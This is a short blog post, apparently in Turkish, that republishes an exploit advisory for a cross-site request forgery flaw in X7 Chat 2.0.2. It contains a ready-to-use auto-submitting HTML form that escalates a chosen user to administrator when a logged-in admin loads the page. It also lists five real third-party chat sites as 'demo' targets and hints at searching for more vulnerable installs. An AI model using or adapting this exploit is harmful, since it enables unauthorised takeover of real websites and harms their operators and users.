14 Aralık 2013 Cumartesi

X7 CHAT 2.0.2 CSRF (add admin) vulenrability

+] Author: TUNISIAN CYBER
[+] Exploit Title:  X7 CHAT 2.0.2 CSRF Add Admin Vulenrability
[+] Date: 13-12-2013
[+] Category: WebApp
[+] Vendor:http://www.x7chat.com/‎
[+] Google Dork: Do Some Work and you'll find it :)
[+] Tested on: Win7 , ubuntu 13.04
  
  
########################################################################################
<html>
    <body onload="document.xform.submit();">
        <form name="xform" action="site.ltd/chat/index.php?act=adminpanel&cp_page=users&update=USER" method="post">
            <input type="hidden" name="username" value="USER" />
            <input type="hidden" name="usergroup" value="PASSWORD" />
        </form>
    </body>
</html>
 
Change USERNAME and PASSWORD
 
Demo:
http://www.ahleenarab.com/chat/
http://www.chat4u.eb2a.com/chat/
http://users.atw.hu/zenechat/chat/
http://www.zenechat.atw.hu/chat
http://filip.yw.sk/Chat/
########################################################################################
Gönderen zaman:

Hiç yorum yok:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)